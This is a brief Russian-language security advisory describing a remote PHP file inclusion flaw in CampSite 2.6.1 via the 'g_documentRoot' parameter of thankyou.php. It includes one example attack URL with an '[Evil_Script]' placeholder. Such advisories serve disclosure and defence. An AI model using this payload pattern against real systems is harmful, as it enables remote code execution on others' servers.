Программа: CampSite 2.6.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "g_documentRoot" сценарием thankyou.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.site.com/[path]/implementation/management/priv/ bugreporter/thankyou.php? g_documentRoot=[Evil_Script]
 

Оставить мнение